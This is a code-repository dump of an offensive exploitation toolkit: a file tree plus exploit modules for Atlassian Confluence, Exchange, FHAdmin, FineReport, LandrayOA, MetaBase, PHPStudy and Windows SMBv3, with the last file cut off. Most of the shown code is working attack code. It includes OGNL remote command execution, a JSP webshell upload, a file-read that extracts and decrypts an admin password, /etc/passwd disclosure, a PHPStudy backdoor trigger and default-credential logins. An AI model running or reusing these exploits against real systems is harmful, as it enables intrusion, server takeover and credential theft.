├── ClassCongregation.py
├── CodeTest.bat
├── CodeTest.pyw
├── EXP
├── ALL.py
├── ApacheShiro.py
├── ApacheSolr.py
├── ApacheStruts2.py
├── ApacheTomcat.py
├── AtlassianConfluence.py
├── Exchange.py
├── FHAdmin.py
├── Fastjson.py
├── FineReport.py
├── LandrayOA.py
├── MetaBase.py
├── OracleWeblogic.py
├── PHPStudy.py
├── ThinkPHP.py
├── Tongda.py
├── WindowsSMBv3.py
└── __init__.py
├── POC
├── ByPass403.py
├── ByWAF_Mysql.py
├── Editor_vul.py
├── FHAdmin.py
├── FOFA.py
├── Fastjson_RCE.py
├── Fckeditor.py
├── GetCMS.py
├── GoogleHacking.py
├── IIS_MS15-034_Range_bytes.py
├── IIS_shortname_Scan.py
├── JSFinder.py
├── JSencode.py
├── LinkFinder.py
├── Log4j-scan.py
├── Nginx_iis_scan.py
├── Redis_unauthorized_access.py
├── Scan_zip.py
├── Shiro_poc_DNS.py
├── SpringBootVulExploit.py
├── Struts2Scan.py
├── Swagger-exp.py
├── TPscan.py
├── ThinkAdmin.py
├── ThinkphpVersion.py
├── Thinkphp_5_0_23_rce.py
├── Thinkphp_5_rce_1.py
├── Tomcat_Ajp-lfi.py
├── Tomcat_http_put.py
├── Tongda_cookie_11_4.py
├── Tongda_rce_11_4.py
├── Tongda_v11_4_rce_getshell.py
├── URL_getTitle.py
├── Weaver-Ecology-OA_RCE-EXP.py
├── WeblogicScan.py
├── Weblogic_GIOP.py
├── Weblogic_T3.py
├── Weblogic_weakPass.py
├── __init__.py
├── js_examples
│ ├── enpassword.js
│ ├── md5.js
│ └── top100password.txt
├── webshell_asp.py
├── webshell_aspx.py
├── webshell_aspx_D.py
├── webshell_jsp.py
├── webshell_php.py
├── webshell_php_D.py
├── xcdn.py
└── 模板.py
├── Proxy
├── WebRequest.py
├── __init__.py
├── handler
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-37.pyc
│ │ ├── configHandler.cpython-37.pyc
│ │ ├── logHandler.cpython-37.pyc
│ │ └── proxyHandler.cpython-37.pyc
│ ├── configHandler.py
│ ├── logHandler.py
│ └── proxyHandler.py
├── helper
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-37.pyc
│ │ ├── check.cpython-37.pyc
│ │ ├── proxy.cpython-37.pyc
│ │ └── validator.cpython-37.pyc
│ ├── check.py
│ ├── fetch.py
│ ├── proxy.py
│ └── validator.py
├── ips.txt
├── log
│ ├── Apache Shiro
│ └── test.log
├── proxyFetcher.py
├── proxySetting.py
├── sqlmap_auto_proxy.bat
├── sqlmap_auto_proxy.py
└── util
│ ├── __init__.py
│ ├── lazyProperty.py
│ ├── singleton.py
│ └── six.py
├── README.md
├── Template
├── EXP.j2
├── POC.j2
└── __init__.py
├── data
├── api-docs.json
├── bool_blind.xml
├── error.xml
└── time_blind.xml
├── execScripts
├── Caidao_cmd.jsp
├── Caidao_shell.asp
├── Caidao_shell.aspx
└── Caidao_shell.php
├── img
├── 1.png
└── 2.png
├── lib
├── green.png
├── note.txt
└── red.png
├── log
└── info.txt
├── payload_html
├── Ueditor
│ ├── Ueditor.html
│ └── ueditor.png
├── chrome_payload.html
├── key.sh
├── kindeditor.html
├── npc
├── npc.exe
├── nps
└── wget.exe
├── python.ico
├── requirements.txt
├── settings.py
└── util
├── ExpRequest.py
└── globalvar.py
/CodeTest.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | if "%1" == "h" goto begin
3 | mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
4 | :begin
5 | python3 -B CodeTest.pyw
--------------------------------------------------------------------------------
/EXP/ALL.py:
--------------------------------------------------------------------------------
1 | import sys,importlib,glob,os,datetime
2 | sys.path.append('../')
3 | #from concurrent.futures import ThreadPoolExecutor,wait,as_completed,ALL_COMPLETED
4 | from ClassCongregation import color
5 |
6 | vuln_scripts = []
7 | exp_scripts = []
8 | for _ in glob.glob('EXP/*.py'):
9 | script_name = os.path.basename(_).replace('.py', '')
10 | if script_name != 'ALL' and script_name != '__init__':
11 | vuln_name = importlib.import_module('.%s'%script_name,package='EXP')
12 | exp_scripts.append(script_name)
13 | vuln_scripts.append(vuln_name)
14 |
15 | def check(**kwargs):
16 | result = ''
17 | now = datetime.datetime.now()
18 | color ("["+str(now)[11:19]+"] " + "[+] Scanning target domain "+kwargs['url'], 'green')
19 | #批量调用
20 | for index in range(len(vuln_scripts)):
21 | try:
22 | result += vuln_scripts[index].check(**kwargs)+'\n'
23 | except Exception as e:
24 | now = datetime.datetime.now()
25 | color ("["+str(now)[11:19]+"] " + "[-] Running {} occured error!!!".format(exp_scripts[index]), 'yellow')
26 | continue
27 | return result
28 | #executor = ThreadPoolExecutor(max_workers = 3)
29 | #for data in executor.map(lambda kwargs: check(**kwargs),vuln_scripts):
30 | # pass
--------------------------------------------------------------------------------
/EXP/AtlassianConfluence.py:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest,Output
2 | from operator import methodcaller
3 | import prettytable as pt
4 | """
5 | cve_2016_4437 反序列化命令执行(可回显)
6 | 目标系统: windows、linux
7 | """
8 | class AtlassianConfluence():
9 | def __init__(self, **env):
10 | """
11 | 基础参数初始化
12 | """
13 | self.url = env.get('url')
14 | self.cookie = env.get('cookie')
15 | self.cmd = env.get('cmd')
16 | self.pocname = env.get('pocname')
17 | self.vuln = env.get('vuln')
18 | self.timeout = int(env.get('timeout'))
19 | self.retry_time = int(env.get('retry_time'))
20 | self.retry_interval = int(env.get('retry_interval'))
21 | self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
22 | self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
23 | self.status = env.get('status')
24 |
25 | def cve_2021_26084(self):
26 | appName = 'Atlassian Confluence'
27 | pocname = 'cve_2021_26084'
28 | path = '/'
29 | method = 'post'
30 | desc = '<6.13.23, 6.14.0~7.4.11, 7.5.0~7.11.5, 7.12.0~7.12.5'
31 | fofa = 'Atlassian Confluence'
32 | #输出类
33 | output = Output(pocname)
34 | #请求类
35 | exprequest = ExpRequest(pocname, output)
36 |
37 | try:
38 | #_verify
39 | if self.vuln == 'False':
40 | paramsPost = {"queryString":"aaa\\u0027+\x23{\\u0022\\u0022[\\u0022class\\u0022]}+\\u0027bbb"}
41 | headers = {"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0","Content-Type":"application/x-www-form-urlencoded"}
42 | response = exprequest.post(self.url, data=paramsPost, headers=headers, verify=False)
43 | if "aaa{class java.lang.String=null}bbb" in response.text:
44 | output.no_echo_success(method, desc)
45 | self.status = 'success'
46 | else:
47 | output.fail()
48 |
49 | #_attack
50 | else:
51 | paramsPost = {"queryString":"kkk\\u0027+\x23{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var x=new java.lang.ProcessBuilder;x.command([\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027" + self.cmd + "\\u0027]);x.start()\\u0022)}+\\u0027"}
52 | headers = {"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0","Content-Type":"application/x-www-form-urlencoded"}
53 | response = exprequest.post(self.url, data=paramsPost, headers=headers, verify=False)
54 | if "kkk{Process" in response.text:
55 | output.no_echo_success(method, desc)
56 | else:
57 | output.fail()
58 | except Exception as error:
59 | output.error_output(str(error))
60 |
61 | tb = pt.PrettyTable()
62 | tb.field_names = ['Target type', 'Vuln Name', 'Impact Version && Vulnerability description']
63 | tb.align['Target type'] = 'l'
64 | tb.align['Vuln Name'] = 'l'
65 | tb.align['Impact Version && Vulnerability description'] = 'l'
66 | tb.add_row(["Atlassian Confluence", "cve_2021_26084", "body=\"Atlassian Confluence\" , [rce]"])
67 | print(tb)
68 |
69 | def check(**kwargs):
70 | result_list = []
71 | result_list.append('----------------------------')
72 | ExpAtlassianConfluence = AtlassianConfluence(**kwargs)
73 | if kwargs['pocname'] != 'ALL':
74 | func = getattr(ExpAtlassianConfluence, kwargs['pocname'])#返回对象函数属性值,可以直接调用
75 | func()#调用函数
76 | return ExpAtlassianConfluence.status
77 | else:#调用所有函数
78 | for func in dir(AtlassianConfluence):
79 | if not func.startswith("__"):
80 | methodcaller(func)(ExpAtlassianConfluence)
81 | result_list.append(func+' -> '+ExpAtlassianConfluence.status)
82 | ExpAtlassianConfluence.status = 'fail'
83 | result_list.append('----------------------------')
84 | return '\n'.join(result_list)
85 |
--------------------------------------------------------------------------------
/EXP/Exchange.py:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest, Output
2 | from ClassCongregation import Dnslog
3 | from operator import methodcaller
4 | """
5 | Exchange_SSRF [ssrf]
6 | """
7 | class Exchange():
8 | def __init__(self, **env):
9 | """
10 | 基础参数初始化
11 | """
12 | self.url = env.get('url')
13 | self.cookie = env.get('cookie')
14 | self.cmd = env.get('cmd')
15 | self.pocname = env.get('pocname')
16 | self.vuln = env.get('vuln')
17 | self.timeout = int(env.get('timeout'))
18 | self.retry_time = int(env.get('retry_time'))
19 | self.retry_interval = int(env.get('retry_interval'))
20 | self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
21 | self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
22 | self.status = env.get('status')
23 |
24 | def Exchange_SSRF(self):
25 | appName = 'Exchange:Exchange_SSRF'
26 | pocname = 'Exchange_SSRF'
27 | path = '/owa/auth/x.js'
28 | method = 'get'
29 | desc = 'Apache Tomcat: Examples File'
30 | info = "[ssrf]"
31 | payload = ''
32 | cookie = 'X-AnonResource=true;X-AnonResource-Backend={}/ecp/default.flt?~3;X-BEResource={}/owa/auth/logon.aspx?~3;'
33 | #输出类
34 | output = Output(pocname)
35 | #请求类
36 | exprequest = ExpRequest(pocname, output)
37 | try:
38 | #_verify
39 | if self.vuln == 'False':
40 | dnslog = Dnslog()
41 | exprequest.get(self.url + path, data=payload, headers={'Cookie':cookie.format(dnslog.dns_host(), dnslog.dns_host())}, timeout=self.timeout, verify=False)
42 | if dnslog.result():
43 | output.echo_success(method, info)
44 | self.status = 'success'
45 | else:
46 | output.fail()
47 | #_attack
48 | else:
49 | request = exprequest.get(self.url + path, data=payload, headers={'Cookie':cookie.format(self.cmd, self.cmd)}, timeout=self.timeout, verify=False)
50 | print(request.text)
51 | except Exception as error:
52 | output.error_output(str(error))
53 |
54 | def check(**kwargs):
55 | result_list = []
56 | result_list.append('----------------------------')
57 | ExpExchange = Exchange(**kwargs)
58 | if kwargs['pocname'] != "ALL":
59 | func = getattr(ExpExchange, kwargs['pocname'])#返回对象函数属性值,可以直接调用
60 | func()#调用函数
61 | return ExpExchange.status
62 | else:#调用所有函数
63 | for func in dir(Exchange):
64 | if not func.startswith("__"):
65 | methodcaller(func)(ExpExchange)
66 | result_list.append(func+' -> '+ExpExchange.status)
67 | ExpExchange.status = 'fail'
68 | result_list.append('----------------------------')
69 | return '\n'.join(result_list)
70 |
--------------------------------------------------------------------------------
/EXP/FHAdmin.py:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest,Output
2 | from operator import methodcaller
3 | """
4 | import util.globalvar as GlobalVar
5 | from ClassCongregation import ysoserial_payload,Dnslog
6 | DL = Dnslog()
7 | DL.dns_host()
8 | DL.result()
9 | """
10 | class FHAdmin():
11 | def __init__(self, **env):
12 | """
13 | 基础参数初始化
14 | """
15 | self.url = env.get('url')
16 | self.cookie = env.get('cookie')
17 | self.cmd = env.get('cmd')
18 | self.pocname = env.get('pocname')
19 | self.vuln = env.get('vuln')
20 | self.timeout = int(env.get('timeout'))
21 | self.retry_time = int(env.get('retry_time'))
22 | self.retry_interval = int(env.get('retry_interval'))
23 | self.status = env.get('status')
24 |
25 | def cve_20210824_upload(self):
26 | appName = 'FHAdmin'
27 | pocname = 'cve_20210824_upload'
28 | path = '/;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/'
29 | method = 'post'
30 | desc = '[upload] 任意文件上传+shiro权限绕过'
31 | data = '--6aaf12c632ee6febfc354d1ba1bc914b\r\nContent-Disposition: form-data; name="imgFile"; filename="a5s_9y.jsp"\r\nContent-Type: application/octet-stream\r\n\r\n123\r\n--6aaf12c632ee6febfc354d1ba1bc914b--'
32 | headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0', 'Connection': 'close', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Content-Type': 'multipart/form-data; boundary=6aaf12c632ee6febfc354d1ba1bc914b'}
33 | #输出类
34 | output = Output(pocname)
35 | #请求类
36 | exprequest = ExpRequest(pocname, output)
37 | try:
38 | if self.vuln == 'False':
39 | r = exprequest.post(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False)
40 | if r"2021" in r.text:
41 | print(r.text)
42 | self.status = 'success'
43 | output.no_echo_success(method, desc)
44 | else:
45 | output.fail()
46 | else:
47 | result = exprequest.post(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False).text
48 | print(self.url+'/;/plugins/uploadify/'+result.strip('\r\n')+'\n\n'+data)
49 | except Exception as error:
50 | output.error_output(str(error))
51 |
52 | def check(**kwargs):
53 | result_list = []
54 | result_list.append('----------------------------')
55 | ExpFHAdmin = FHAdmin(**kwargs)
56 | if kwargs['pocname'] != 'ALL':
57 | func = getattr(ExpFHAdmin, kwargs['pocname'])#返回对象函数属性值,可以直接调用
58 | func()#调用函数
59 | return ExpFHAdmin.status
60 | else:#调用所有函数
61 | for func in dir(FHAdmin):
62 | if not func.startswith("__"):
63 | methodcaller(func)(ExpFHAdmin)
64 | result_list.append(func+' -> '+ExpFHAdmin.status)
65 | ExpFHAdmin.status = 'fail'
66 | result_list.append('----------------------------')
67 | return '\n'.join(result_list)
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
--------------------------------------------------------------------------------
/EXP/FineReport.py:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest,Output
2 | from ClassCongregation import random_name
3 | from operator import methodcaller
4 | import re
5 | """
6 | --FineReport--
7 | CVE_20210408 [upload],默认self.vuln = None
8 | """
9 | class FineReport():
10 | def __init__(self, **env):
11 | """
12 | 基础参数初始化
13 | """
14 | self.url = env.get('url')
15 | self.cookie = env.get('cookie')
16 | self.cmd = env.get('cmd')
17 | self.pocname = env.get('pocname')
18 | self.vuln = env.get('vuln')
19 | self.timeout = int(env.get('timeout'))
20 | self.retry_time = int(env.get('retry_time'))
21 | self.retry_interval = int(env.get('retry_interval'))
22 | self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
23 | self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
24 | self.status = env.get('status')
25 |
26 | def CVE_20210408_FineReport(self):
27 | appName = 'FineReport'
28 | pocname = 'CVE_20210408'
29 | method = 'post'
30 | desc = 'FineReport:CVE_20210408'
31 | info = '[upload]'
32 | path = r'/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/'
33 | payload_verify = r'{"__CONTENT__":"VuLnEcHoPoCSuCCeSS","__CHARSET__":"UTF-8"}'
34 | payload = r'{"__CONTENT__":"<%Runtime.getRuntime().exec(request.getParameter(\"cmd\"));%>","__CHARSET__":"UTF-8"}'
35 | headers = {
36 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0',
37 | 'Connection': 'close',
38 | 'Accept-Encoding': 'gzip, deflate',
39 | 'Accept': '*/*',
40 | 'Content-Type': 'text/xml;charset=UTF-8',
41 | 'Accept-Au': '0c42b2f264071be0507acea1876c74'
42 | }
43 | #输出类
44 | output = Output(pocname)
45 | #请求类
46 | exprequest = ExpRequest(pocname, output)
47 | name = random_name(6)+'.jsp'
48 | path += name
49 | try:
50 | #_verify
51 | if self.vuln == 'False':
52 | request = exprequest.post(self.url + path, data=payload_verify, headers=headers, timeout=self.timeout, verify=False)
53 | request = exprequest.get(self.url + '/WebReport/' + name, headers=headers, timeout=self.timeout, verify=False)
54 | if 'VuLnEcHoPoCSuCCeSS' in request.text:
55 | output.echo_success(method, info)
56 | self.status = 'success'
57 | else:
58 | output.fail()
59 | #_attack
60 | else:
61 | request = exprequest.post(self.url + path, data=payload, headers=headers, timeout=self.timeout, verify=False)
62 | print(self.url + path)
63 | except Exception as error:
64 | output.error_output(str(error))
65 |
66 | def check(**kwargs):
67 | result_list = []
68 | result_list.append('----------------------------')
69 | ExpFineReport = FineReport(**kwargs)
70 | if kwargs['pocname'] != 'ALL':
71 | func = getattr(ExpFineReport, kwargs['pocname'])#返回对象函数属性值,可以直接调用
72 | func()#调用函数
73 | return ExpFineReport.status
74 | else:#调用所有函数
75 | for func in dir(FineReport):
76 | if not func.startswith("__"):
77 | methodcaller(func)(ExpFineReport)
78 | result_list.append(func+' -> '+ExpFineReport.status)
79 | ExpFineReport.status = 'fail'
80 | result_list.append('----------------------------')
81 | return '\n'.join(result_list)
82 |
83 |
--------------------------------------------------------------------------------
/EXP/LandrayOA.py:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest,Output
2 | from ClassCongregation import des_dec
3 | from operator import methodcaller
4 | import prettytable as pt
5 | import re
6 | """
7 | import util.globalvar as GlobalVar
8 | from ClassCongregation import ysoserial_payload,Dnslog
9 | DL = Dnslog()
10 | DL.dns_host()
11 | DL.result()
12 | """
13 | class LandrayOA():
14 | def __init__(self, **env):
15 | """
16 | 基础参数初始化
17 | """
18 | self.url = env.get('url')
19 | self.cookie = env.get('cookie')
20 | self.cmd = env.get('cmd')
21 | self.pocname = env.get('pocname')
22 | self.vuln = env.get('vuln')
23 | self.timeout = int(env.get('timeout'))
24 | self.retry_time = int(env.get('retry_time'))
25 | self.retry_interval = int(env.get('retry_interval'))
26 | self.status = env.get('status')
27 |
28 | def cve_custom_filereading(self):
29 | appName = 'LandrayOA'
30 | pocname = 'cve_custom_filereading'
31 | path = '/sys/ui/extend/varkind/custom.jsp'
32 | method = 'post'
33 | desc = '[file reading] app="Landray-OA系统"'
34 | data = 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
35 | headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0', 'Connection': 'close', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'}
36 | #输出类
37 | output = Output(pocname)
38 | #请求类
39 | exprequest = ExpRequest(pocname, output)
40 | try:
41 | if self.vuln == 'False':
42 | r = exprequest.post(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False)
43 | if r"password" in r.text:
44 | self.status = 'success'
45 | output.no_echo_success(method, desc)
46 | else:
47 | output.fail()
48 | else:
49 | result = exprequest.post(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False).text
50 | pwd = re.search(r'password = (.*)\\r', result).group(1)
51 | #默认只取前8位密钥
52 | pwd = des_dec(pwd, 'kmssAdminKey'[0:8])
53 | print('[+]登录地址: %s ,登录密码: %s'%(self.url+'/admin.do',pwd))
54 | except Exception as error:
55 | output.error_output(str(error))
56 |
57 | tb = pt.PrettyTable()
58 | tb.field_names = ['Target type', 'Vuln Name', 'Impact Version && Vulnerability description']
59 | tb.align['Target type'] = 'l'
60 | tb.align['Vuln Name'] = 'l'
61 | tb.align['Impact Version && Vulnerability description'] = 'l'
62 | tb.add_row([
63 | "LandrayOA",
64 | "cve_custom_filereading",
65 | "[file reading] app=\"Landray-OA系统\""
66 | ])
67 | print(tb)
68 |
69 | def check(**kwargs):
70 | result_list = []
71 | result_list.append('----------------------------')
72 | ExpLandrayOA = LandrayOA(**kwargs)
73 | if kwargs['pocname'] != 'ALL':
74 | func = getattr(ExpLandrayOA, kwargs['pocname'])#返回对象函数属性值,可以直接调用
75 | func()#调用函数
76 | return ExpLandrayOA.status
77 | else:#调用所有函数
78 | for func in dir(LandrayOA):
79 | if not func.startswith("__"):
80 | methodcaller(func)(ExpLandrayOA)
81 | result_list.append(func+' -> '+ExpLandrayOA.status)
82 | ExpLandrayOA.status = 'fail'
83 | result_list.append('----------------------------')
84 | return '\n'.join(result_list)
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
--------------------------------------------------------------------------------
/EXP/MetaBase.py:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest,Output
2 | from operator import methodcaller
3 | import prettytable as pt
4 | """
5 | import util.globalvar as GlobalVar
6 | from ClassCongregation import ysoserial_payload,Dnslog
7 | DL = Dnslog()
8 | DL.dns_host()
9 | DL.result()
10 | """
11 | class MetaBase():
12 | def __init__(self, **env):
13 | """
14 | 基础参数初始化
15 | """
16 | self.url = env.get('url')
17 | self.cookie = env.get('cookie')
18 | self.cmd = env.get('cmd')
19 | self.pocname = env.get('pocname')
20 | self.vuln = env.get('vuln')
21 | self.timeout = int(env.get('timeout'))
22 | self.retry_time = int(env.get('retry_time'))
23 | self.retry_interval = int(env.get('retry_interval'))
24 | self.status = env.get('status')
25 |
26 | def cve_MetaBase_20211123(self):
27 | appName = 'MetaBase'
28 | pocname = 'cve_MetaBase_20211123'
29 | path = '/api/geojson?url=file:/etc/passswd'
30 | method = 'get'
31 | desc = '[file reading] metabase version >= 1.0.0, < 1.40.5'
32 | data = ''
33 | headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0', 'Connection': 'close', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*'}
34 | #输出类
35 | output = Output(pocname)
36 | #请求类
37 | exprequest = ExpRequest(pocname, output)
38 | try:
39 | if self.vuln == 'False':
40 | r = exprequest.get(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False)
41 | if r"root:x" in r.text:
42 | self.status = 'success'
43 | output.no_echo_success(method, desc)
44 | else:
45 | output.fail()
46 | else:
47 | result = exprequest.get(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False).text
48 | print(result)
49 | except Exception as error:
50 | output.error_output(str(error))
51 |
52 | tb = pt.PrettyTable()
53 | tb.field_names = ['Target type', 'Vuln Name', 'Impact Version && Vulnerability description']
54 | tb.align['Target type'] = 'l'
55 | tb.align['Vuln Name'] = 'l'
56 | tb.align['Impact Version && Vulnerability description'] = 'l'
57 | tb.add_row([
58 | "MetaBase",
59 | "cve_MetaBase_20211123",
60 | "[file reading] metabase version >= 1.0.0, < 1.40.5"
61 | ])
62 | print(tb)
63 |
64 | def check(**kwargs):
65 | result_list = []
66 | result_list.append('----------------------------')
67 | ExpMetaBase = MetaBase(**kwargs)
68 | if kwargs['pocname'] != 'ALL':
69 | func = getattr(ExpMetaBase, kwargs['pocname'])#返回对象函数属性值,可以直接调用
70 | func()#调用函数
71 | return ExpMetaBase.status
72 | else:#调用所有函数
73 | for func in dir(MetaBase):
74 | if not func.startswith("__"):
75 | methodcaller(func)(ExpMetaBase)
76 | result_list.append(func+' -> '+ExpMetaBase.status)
77 | ExpMetaBase.status = 'fail'
78 | result_list.append('----------------------------')
79 | return ''.join(result_list).strip('\n')
80 |
--------------------------------------------------------------------------------
/EXP/PHPStudy.py:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest,Output
2 | from operator import methodcaller
3 | from ClassCongregation import Dnslog#通过Dnslog判断
4 | import base64
5 | import time
6 | class PHPStudy():
7 | def __init__(self, **env):
8 | """
9 | 基础参数初始化
10 | """
11 | self.url = env.get('url')
12 | self.cookie = env.get('cookie')
13 | self.cmd = env.get('cmd')
14 | self.pocname = env.get('pocname')
15 | self.vuln = env.get('vuln')
16 | self.timeout = int(env.get('timeout'))
17 | self.retry_time = int(env.get('retry_time'))
18 | self.retry_interval = int(env.get('retry_interval'))
19 | self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
20 | self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
21 | self.status = env.get('status')
22 |
23 | def PHPStudyBackdoor(self):
24 | DL = Dnslog() #申请dnslog地址
25 | appName = 'PHPStudy'
26 | pocname = 'PHPStudyBackdoor'
27 | path = '/index.php'
28 | method = 'get'
29 | desc = 'PHPStudyBackdoor脚本漏洞'
30 | payload = ('''system("ping {}");''').format(DL.dns_host())
31 | payload = base64.b64encode(payload.encode('utf-8'))
32 | Headers = {
33 | 'Sec-Fetch-Mode' : 'navigate',
34 | 'Sec-Fetch-User' : '?1',
35 | 'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
36 | 'Sec-Fetch-Site' : 'none',
37 | 'accept-charset' : payload
38 | }
39 | #输出类
40 | output = Output(pocname)
41 | #请求类
42 | exprequest = ExpRequest(pocname, output)
43 |
44 | try:
45 | exprequest.get(self.url+path, headers=Headers, timeout=self.timeout, verify=False)
46 | time.sleep(2)
47 | if DL.result():
48 | info = "存在phpStudyBackdoor脚本漏洞, Payload:{}".format(payload)
49 | output.echo_success(method, info)
50 | self.status = 'success'
51 | else:
52 | output.fail()
53 | except Exception as error:
54 | output.error_output(str(error))
55 |
56 | def PHPStudyphpmyadmin(self):
57 | appName = 'PHPStudy'
58 | pocname = 'PHPStudyphpmyadmin'
59 | path = "/phpmyadmin/index.php"
60 | method = 'post'
61 | desc = 'phpstudy_phpmyadmin默认密码漏洞'
62 | payload = {
63 | "pma_username": "root",
64 | "pma_password": "root",
65 | "server": "1",
66 | "target": "index.php"
67 | }
68 | Headers = {
69 | 'Accept' : '*/*',
70 | 'Content-Type' : 'application/x-www-form-urlencoded'
71 | }
72 | #输出类
73 | output = Output(pocname)
74 | #请求类
75 | exprequest = ExpRequest(pocname, output)
76 |
77 | try:
78 | resp = exprequest.post(self.url+path, data=payload, headers=Headers, timeout=self.timeout, verify=False).text
79 | resp2 = exprequest.get(self.url+path, headers=Headers, timeout=self.timeout, verify=False).text
80 |
81 | if resp2.lower().find('navigation.php')!=-1 and resp.lower().find('frame_navigation')!=-1:
82 | info = "存在phpstudy_phpmyadmin默认密码漏洞"
83 | output.echo_success(method, info)
84 | self.status = 'success'
85 | else:
86 | output.fail()
87 | except Exception as error:
88 | output.error_output(str(error))
89 |
90 | def PHPStudyProbe(self):
91 | appName = 'PHPStudy'
92 | pocname = 'PHPStudyProbe'
93 | path = '/l.php'
94 | method = 'get'
95 | desc = 'PHPStudy探针泄露漏洞'
96 | #输出类
97 | output = Output(pocname)
98 | #请求类
99 | exprequest = ExpRequest(pocname, output)
100 |
101 | try:
102 | resp = exprequest.get(self.url+path, timeout=self.timeout, verify=False).text
103 |
104 | if resp.lower().find('php_version')!=-1 and resp.lower().find('phpstudy')!=-1:
105 | info = "存在phpstudy探针泄露漏洞"
106 | output.echo_success(method, info)
107 | self.status = 'success'
108 | else:
109 | output.fail()
110 | except Exception as error:
111 | output.error_output(str(error))
112 |
113 | def check(**kwargs):
114 | result_list = []
115 | result_list.append('----------------------------')
116 | ExpPHPStudy = PHPStudy(**kwargs)
117 | if kwargs['pocname'] != 'ALL':
118 | func = getattr(ExpPHPStudy, kwargs['pocname'])#返回对象函数属性值,可以直接调用
119 | func()#调用函数
120 | return ExpPHPStudy.status
121 | else:#调用所有函数
122 | for func in dir(PHPStudy):
123 | if not func.startswith("__"):
124 | methodcaller(func)(ExpPHPStudy)
125 | result_list.append(func+' -> '+ExpPHPStudy.status)
126 | ExpPHPStudy.status = 'fail'
127 | result_list.append('----------------------------')
128 | return '\n'.join(result_list)
129 |
130 |
131 |
--------------------------------------------------------------------------------
/EXP/WindowsSMBv3.py:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest,Output
2 | from operator import methodcaller
3 | import socket
4 | import struct
5 | class WindowsSMBv3():
6 | def __init__(self, **env):
7 | """
8 | 基础参数初始化
9 | """
10 | self.url = env.get('url')
11 | self.cookie = env.get('cookie')
12 | self.cmd = env.get('cmd')
13 | self.pocname = env.get('pocname')
14 | self.vuln = env.get('vuln')
15 | self.timeout = int(env.get('timeout'))
16 | self.retry_time = int(env.get('retry_time'))
17 | self.retry_interval = int(env.get('retry_interval'))
18 | self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
19 | self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
20 | self.status = env.get('status')
21 |
22 | def CVE_2020_0796(self):
23 | appName = 'Windows'
24 | pocname = 'CVE_2020_0796'
25 | method = 'socket'
